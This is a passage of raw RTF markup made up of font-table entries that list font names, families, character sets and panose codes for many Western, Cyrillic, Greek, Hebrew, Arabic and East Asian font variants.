{\f264\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Unicode MS CE;}{\f265\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Cyr;}
{\f266\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Greek;}{\f267\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Tur;}
{\f268\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Arial Unicode MS (Hebrew);}{\f269\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Arial Unicode MS (Arabic);}
{\f270\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Baltic;}{\f271\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Haettenschweiler CE;}
{\f272\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Haettenschweiler Cyr;}{\f273\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Haettenschweiler Greek;}
{\f274\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Haettenschweiler Tur;}{\f275\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Haettenschweiler Baltic;}{\f276\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}HoratioDMed Tur;}
{\f277\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}@MS Mincho Western;}{\f278\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}@MS Mincho CE;}{\f279\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}@MS Mincho Cyr;}
{\f280\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}@MS Mincho Greek;}{\f281\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}@MS Mincho Tur;}{\f282\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}@MS Mincho Baltic;}
{\f283\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}@SimSun Western;}{\f284\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Charcoal;}{\f285\fnil\fcharset256\fprq2{\*\panose 03020702040506060504}Apple Chancery;}
{\f286\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Aristocrat LET;}{\f287\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bertram LET;}{\f288\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Bickley Script LET;}
{\f289\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}BlairMdITC TT-Medium;}{\f290\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni Ornaments ITC TT;}
{\f291\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bodoni SvtyTwo ITC TT-Bold;}{\f292\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo ITC TT-Book;}
{\f293\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo ITC TT-BookIta;}{\f294\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bodoni SvtyTwo OS ITC TT-Bold;}
{\f295\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo OS ITC TT-Book;}{\f296\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Bodoni SvtyTwo OS ITC TT-BookIt;}
{\f297\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Bordeaux Roman Bold LET;}{\f298\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Bradley Hand ITC TT-Bold;}{\f299\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Capitals;}
{\f300\fnil\fcharset256\fprq2{\*\panose 020b0806080604040204}Chicago;}{\f301\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Gadget;}{\f302\fnil\fcharset256\fprq2{\*\panose 02030602050506020203}Hoefler Text;}
{\f303\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Hoefler Text Ornaments;}{\f304\fnil\fcharset256\fprq2{\*\panose 00000300000000000000}Humana Serif ITC TT-Light;}
{\f305\fnil\fcharset256\fprq2{\*\panose 00000300000000000000}Humana Serif ITC TT-LightIta;}{\f306\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}Humana Serif ITC TT-MedIta;}
{\f307\fnil\fcharset256\fprq2{\*\panose 00000500000000000000}Humana Serif ITC TT-Medium;}{\f308\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Jokerman LET;}{\f309\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}LunaITC TT-Bold;}
{\f310\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Machine ITC TT;}{\f311\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Mona Lisa Solid ITC TT;}{\f312\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Monaco;}
{\f313\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Palatino;}{\f314\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Party LET;}{\f315\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}PortagoITC TT;}
{\f316\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Sand;}{\f317\fnil\fcharset256\fprq2{\*\panose 020d0502020204020204}Skia;}{\f318\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Stone Sans ITC TT-Bold;}
{\f319\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans ITC TT-Semi;}{\f320\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans ITC TT-SemiIta;}
{\f321\fnil\fcharset256\fprq2{\*\panose 00000700000000000000}Stone Sans OS ITC TT-Bold;}{\f322\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans OS ITC TT-Semi;}
{\f323\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans OS ITCTT-SemiIta;}{\f324\fnil\fcharset256\fprq2{\*\panose 00000600000000000000}Stone Sans SC ITC TT-Semi;}{\f325\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}Techno;}
{\f326\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Textile;}{\f327\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}TremorITC TT;}{\f328\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Wanted LET;}{\f329\fnil\fcharset256\fprq2 VT100;}
}{\*\ud{\fonttbl{\f0\fnil\fcharset256\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fnil\fcharset256\fprq2{\*\panose 020b0604020202020204}Arial;}{\f2\fnil\fcharset256\fprq2{\*\panose 02070309020205020404}Courier New;}
{\f3\fnil\fcharset2\fprq2{\*\panose 02000500000000000000}Symbol;}{\f4\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Times;}{\f5\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Helvetica{\*\falt Arial};}
{\f6\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Courier;}{\f7\fnil\fcharset256\fprq2{\*\panose 020b0503030404040204}Geneva;}{\f8\froman\fcharset77\fprq2{\*\panose 00000000000000000000}Tms Rmn;}
{\f9\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}Helv;}{\f10\froman\fcharset77\fprq2{\*\panose 00000000000000000000}MS Serif;}{\f11\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}MS Sans Serif;}
{\f12\fnil\fcharset256\fprq2{\*\panose 02020502060305060204}New York;}{\f13\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}System;}{\f14\fnil\fcharset2\fprq2{\*\panose 05020102010804080708}Wingdings;}
{\f15\froman\fcharset256\fprq1{\*\panose 00000000000000000000}FE Roman font face;}{\f16\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}FE Modern font face;}
{\f17\froman\fcharset256\fprq1{\*\panose 00000000000000000000}FE Truetype Roman font face;}{\f18\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}FE Truetype Modern font face;}{\f19\froman\fcharset77\fprq2{\*\panose 00000000000000000000}Century;}
{\f20\froman\fcharset128\fprq1{\*\panose 00000000000000000000}Mincho{\*\falt ??};}{\f21\froman\fcharset129\fprq2{\*\panose 02030600000101010101}Batang{\*\falt ??};}{\f22\fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ??};}
{\f23\froman\fcharset136\fprq2{\*\panose 02020300000000000000}PMingLiU{\*\falt ????};}{\f24\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}Gothic{\*\falt ?????};}{\f25\fmodern\fcharset129\fprq1{\*\panose 00000000000000000000}Dotum{\*\falt ??};}
{\f26\fmodern\fcharset134\fprq1{\*\panose 00000000000000000000}SimHei{\*\falt ??};}{\f27\fmodern\fcharset136\fprq1{\*\panose 00000000000000000000}MingLiU{\*\falt ???};}
{\f28\fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?? ??};}{\f29\froman\fcharset129\fprq1{\*\panose 00000000000000000000}Gulim{\*\falt ??};}
{\f30\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}MS Gothic{\*\falt ?? ????};}{\f31\fswiss\fcharset256\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f32\fnil\fcharset256\fprq2{\*\panose 020b0a04020102020204}Arial Black;}
{\f33\fmodern\fcharset256\fprq1{\*\panose 020b0509030504030204}Lucida Sans Typewriter{\*\falt Andale Mono};}{\f34\fnil\fcharset256\fprq2{\*\panose 020b0604030504040204}Verdana;}
{\f35\fswiss\fcharset256\fprq2{\*\panose 020b0604030504040204}Verdana Ref{\*\falt Verdana};}{\f36\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}Fixedsys;}{\f37\fmodern\fcharset255\fprq1{\*\panose 00000000000000000000}Terminal;}
{\f38\fswiss\fcharset256\fprq2{\*\panose 00000000000000000000}Small Fonts;}{\f39\fnil\fcharset2\fprq2{\*\panose 00000000000000000000}Marlett;}{\f40\fswiss\fcharset256\fprq2{\*\panose 020b0504020203020204}News Gothic MT;}
{\f41\fscript\fcharset256\fprq2{\*\panose 03010101010101010101}Lucida Handwriting;}{\f42\fswiss\fcharset256\fprq2{\*\panose 020b0602030504090204}Lucida Sans;}{\f43\fswiss\fcharset256\fprq2{\*\panose 020b0602030504020204}Lucida Sans Unicode;}
{\f44\froman\fcharset256\fprq2{\*\panose 02040602050305030304}Book Antiqua;}{\f45\fswiss\fcharset256\fprq2{\*\panose 020b0502020202020204}Century Gothic;}{\f46\fmodern\fcharset256\fprq1{\*\panose 02010509020102010303}OCR A Extended;}
{\f47\froman\fcharset256\fprq2{\*\panose 02040603050505030304}Calisto MT;}{\f48\fswiss\fcharset256\fprq2{\*\panose 020b0306030101010103}Abadi MT Condensed Light;}{\f49\fswiss\fcharset256\fprq2{\*\panose 020e0705020206020404}Copperplate Gothic Bold;}
{\f50\fswiss\fcharset256\fprq2{\*\panose 020e0507020206020404}Copperplate Gothic Light;}{\f51\fdecor\fcharset256\fprq2{\*\panose 04040403030d02020704}Matisse ITC;}{\f52\fdecor\fcharset256\fprq2{\*\panose 04020404030d07020202}Tempus Sans ITC;}
{\f53\fdecor\fcharset256\fprq2{\*\panose 04040506030f02020702}Westminster;}{\f54\fmodern\fcharset256\fprq1{\*\panose 020b0609040504020204}Lucida Console;}{\f55\fnil\fcharset256\fprq2{\*\panose 030f0702030302020204}Comic Sans MS;}
{\f56\fnil\fcharset256\fprq2{\*\panose 020b0806030902050204}Impact;}{\f57\fnil\fcharset2\fprq2{\*\panose 05030102010509060703}Webdings;}{\f58\fnil\fcharset2\fprq2{\*\panose 00000400000000000000}StarBats;}
{\f59\fnil\fcharset2\fprq2{\*\panose 00000400000000000000}StarMath;}{\f60\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Arioso;}{\f61\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}ChevaraOutline;}
{\f62\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Chevara;}{\f63\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Conga;}{\f64\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}HelmetCondensed;}
{\f65\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Helmet;}{\f66\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Timmons;}{\f67\fswiss\fcharset256\fprq2{\*\panose 020e0802040304020204}Albertus Extra Bold;}
{\f68\fswiss\fcharset256\fprq2{\*\panose 020e0602030304020304}Albertus Medium;}{\f69\fswiss\fcharset256\fprq2{\*\panose 020b0603020204030204}Antique Olive;}{\f70\fswiss\fcharset256\fprq2{\*\panose 020b0506020203020204}Arial Narrow;}
{\f71\froman\fcharset256\fprq2{\*\panose 02050604050505020204}Bookman Old Style;}{\f72\froman\fcharset256\fprq2{\*\panose 02040603050505020303}Century Schoolbook;}{\f73\fswiss\fcharset256\fprq2{\*\panose 020b0502050508020304}CG Omega;}
{\f74\froman\fcharset256\fprq2{\*\panose 02020603050405020304}CG Times;}{\f75\froman\fcharset256\fprq2{\*\panose 02040706040705040204}Clarendon Condensed;}{\f76\fscript\fcharset256\fprq2{\*\panose 03030502040406070605}Coronet;}
{\f77\froman\fcharset256\fprq2{\*\panose 02020502050306020203}Garamond;}{\f78\fmodern\fcharset256\fprq1{\*\panose 020b0409020202030204}Letter Gothic;}{\f79\fscript\fcharset256\fprq2{\*\panose 03020702040402020504}Marigold;}
{\f80\fscript\fcharset256\fprq2{\*\panose 03010101010201010101}Monotype Corsiva;}{\f81\fnil\fcharset2\fprq2{\*\panose 01010601010101010101}Monotype Sorts;}{\f82\fswiss\fcharset256\fprq2{\*\panose 020b0603020202030204}Univers;}
{\f83\fswiss\fcharset256\fprq2{\*\panose 020b0606020202060204}Univers Condensed;}{\f84\fnil\fcharset256\fprq2{\*\panose 02040502050405020303}Georgia;}{\f85\fnil\fcharset256\fprq2{\*\panose 020b0603020202020204}Trebuchet MS;}
{\f86\fnil\fcharset256\fprq2{\*\panose 020b0509000000000004}Andale Mono;}{\f87\froman\fcharset256\fprq2{\*\panose 00050102010706020507}Map Symbols;}{\f88\fswiss\fcharset128\fprq2{\*\panose 020b0604020202020204}Arial Unicode MS;}
{\f89\fswiss\fcharset256\fprq2{\*\panose 020b0706040902060204}Haettenschweiler;}{\f90\fnil\fcharset2\fprq2{\*\panose 05000000000000000000}MS Outlook;}{\f91\froman\fcharset2\fprq2{\*\panose 05020102010507070707}Wingdings 2;}
{\f92\froman\fcharset2\fprq2{\*\panose 05040102010807070707}Wingdings 3;}{\f93\fnil\fcharset2\fprq2{\*\panose 02000500000000000000}MT Extra;}{\f94\fswiss\fcharset256\fprq2{\*\panose 020b0602020203020303}HoratioDMed;}
{\f95\fnil\fcharset178\fprq2{\*\panose 02010000000000000000}Arabic Transparent;}{\f96\fnil\fcharset178\fprq2{\*\panose 02010000000000000000}Traditional Arabic;}{\f97\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}David;}
{\f98\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}David Transparent;}{\f99\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}Miriam;}{\f100\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Miriam Fixed;}
{\f101\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Fixed Miriam Transparent;}{\f102\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}Miriam Transparent;}{\f103\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Rod;}
{\f104\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}@MS Mincho;}{\f105\fnil\fcharset134\fprq2{\*\panose 00000000000000000000}@SimSun;}{\f106\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Times New Roman CE;}
{\f107\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Times New Roman Cyr;}{\f108\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Times New Roman Greek;}{\f109\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Times New Roman Tur;}
{\f110\froman\fcharset177\fprq2{\*\panose 00000000000000000000}Times New Roman (Hebrew);}{\f111\froman\fcharset178\fprq2{\*\panose 00000000000000000000}Times New Roman (Arabic);}
{\f112\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Times New Roman Baltic;}{\f113\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial CE;}{\f114\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Cyr;}
{\f115\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Greek;}{\f116\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Tur;}{\f117\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Arial (Hebrew);}
{\f118\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Arial (Arabic);}{\f119\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Baltic;}{\f120\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Courier New CE;}
{\f121\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Courier New Cyr;}{\f122\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Courier New Greek;}{\f123\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Courier New Tur;}
{\f124\fmodern\fcharset177\fprq1{\*\panose 00000000000000000000}Courier New (Hebrew);}{\f125\fmodern\fcharset178\fprq1{\*\panose 00000000000000000000}Courier New (Arabic);}
{\f126\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Courier New Baltic;}{\f127\froman\fcharset256\fprq2{\*\panose 00000000000000000000}Batang Western{\*\falt ??};}
{\f128\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Batang CE{\*\falt ??};}{\f129\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Batang Cyr{\*\falt ??};}
{\f130\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Batang Greek{\*\falt ??};}{\f131\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Batang Tur{\*\falt ??};}
{\f132\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Batang Baltic{\*\falt ??};}{\f133\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}SimSun Western{\*\falt ??};}
{\f134\froman\fcharset256\fprq2{\*\panose 00000000000000000000}PMingLiU Western{\*\falt ????};}{\f135\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}MS Mincho Western{\*\falt ?? ??};}
{\f136\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}MS Mincho CE{\*\falt ?? ??};}{\f137\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}MS Mincho Cyr{\*\falt ?? ??};}
{\f138\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}MS Mincho Greek{\*\falt ?? ??};}{\f139\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}MS Mincho Tur{\*\falt ?? ??};}
{\f140\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}MS Mincho Baltic{\*\falt ?? ??};}{\f141\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Century CE;}{\f142\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Century Cyr;}
{\f143\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Century Greek;}{\f144\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Century Tur;}{\f145\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Century Baltic;}
{\f146\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Tahoma CE;}{\f147\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Tahoma Cyr;}{\f148\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Tahoma Greek;}
{\f149\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma Tur;}{\f150\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Tahoma (Hebrew);}{\f151\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Tahoma (Arabic);}
{\f152\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Tahoma Baltic;}{\f153\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Black CE;}{\f154\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Black Cyr;}
{\f155\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Black Greek;}{\f156\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Black Tur;}{\f157\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Black Baltic;}
{\f158\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Verdana CE;}{\f159\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Verdana Cyr;}{\f160\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Verdana Greek;}
{\f161\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Verdana Tur;}{\f162\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Verdana Baltic;}{\f163\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Verdana Ref CE{\*\falt Tahoma};}
{\f164\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Verdana Ref Cyr{\*\falt Tahoma};}{\f165\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Verdana Ref Greek{\*\falt Tahoma};}
{\f166\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Verdana Ref Tur{\*\falt Tahoma};}{\f167\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Verdana Ref Baltic{\*\falt Tahoma};}
{\f168\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode CE;}{\f169\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Cyr;}
{\f170\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Greek;}{\f171\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Tur;}
{\f172\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode (Hebrew);}{\f173\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Book Antiqua CE;}{\f174\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Book Antiqua Cyr;}
{\f175\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Book Antiqua Greek;}{\f176\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Book Antiqua Tur;}{\f177\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Book Antiqua Baltic;}
{\f178\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Century Gothic CE;}{\f179\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Century Gothic Cyr;}{\f180\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Century Gothic Greek;}
{\f181\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Century Gothic Tur;}{\f182\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Century Gothic Baltic;}{\f183\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Lucida Console CE;}
{\f184\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Lucida Console Cyr;}{\f185\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Lucida Console Greek;}{\f186\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Lucida Console Tur;}
{\f187\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Comic Sans MS CE;}{\f188\fscript\fcharset204\fprq2{\*\panose 00000000000000000000}Comic Sans MS Cyr;}{\f189\fscript\fcharset161\fprq2{\*\panose 00000000000000000000}Comic Sans MS Greek;}
{\f190\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Comic Sans MS Tur;}{\f191\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Comic Sans MS Baltic;}{\f192\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Impact CE;}
{\f193\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Impact Cyr;}{\f194\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Impact Greek;}{\f195\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Impact Tur;}
{\f196\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Impact Baltic;}{\f197\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold CE;}{\f198\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold Tur;}
{\f199\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold Baltic;}{\f200\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Albertus Medium CE;}
{\f201\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Albertus Medium Tur;}{\f202\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Albertus Medium Baltic;}{\f203\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Antique Olive CE;}
{\f204\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Antique Olive Tur;}{\f205\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Antique Olive Baltic;}{\f206\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Narrow CE;}
{\f207\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Narrow Tur;}{\f208\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Narrow Baltic;}{\f209\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Bookman Old Style CE;}
{\f210\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Bookman Old Style Cyr;}{\f211\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Bookman Old Style Greek;}
{\f212\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Bookman Old Style Tur;}{\f213\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Bookman Old Style Baltic;}
{\f214\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Century Schoolbook CE;}{\f215\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Century Schoolbook Tur;}
{\f216\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Century Schoolbook Baltic;}{\f217\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}CG Omega CE;}{\f218\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}CG Omega Tur;}
{\f219\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}CG Omega Baltic;}{\f220\froman\fcharset238\fprq2{\*\panose 00000000000000000000}CG Times CE;}{\f221\froman\fcharset162\fprq2{\*\panose 00000000000000000000}CG Times Tur;}
{\f222\froman\fcharset186\fprq2{\*\panose 00000000000000000000}CG Times Baltic;}{\f223\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Clarendon Condensed CE;}{\f224\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Clarendon Condensed Tur;}
{\f225\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Clarendon Condensed Baltic;}{\f226\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Coronet CE;}{\f227\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Coronet Tur;}
{\f228\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Coronet Baltic;}{\f229\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Garamond CE;}{\f230\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Garamond Cyr;}
{\f231\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Garamond Greek;}{\f232\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Garamond Tur;}{\f233\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Garamond Baltic;}
{\f234\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Letter Gothic CE;}{\f235\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Letter Gothic Tur;}{\f236\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Letter Gothic Baltic;}
{\f237\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Marigold CE;}{\f238\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Marigold Tur;}{\f239\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Marigold Baltic;}
{\f240\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Monotype Corsiva CE;}{\f241\fscript\fcharset204\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Cyr;}
{\f242\fscript\fcharset161\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Greek;}{\f243\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Tur;}
{\f244\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Baltic;}{\f245\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Univers CE;}{\f246\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Univers Tur;}
{\f247\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Univers Baltic;}{\f248\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Univers Condensed CE;}{\f249\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Univers Condensed Tur;}
{\f250\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Univers Condensed Baltic;}{\f251\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Georgia CE;}{\f252\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Georgia Cyr;}
{\f253\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Georgia Greek;}{\f254\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Georgia Tur;}{\f255\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Georgia Baltic;}
{\f256\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Trebuchet MS CE;}{\f257\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Trebuchet MS Tur;}{\f258\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Andale Mono CE;}
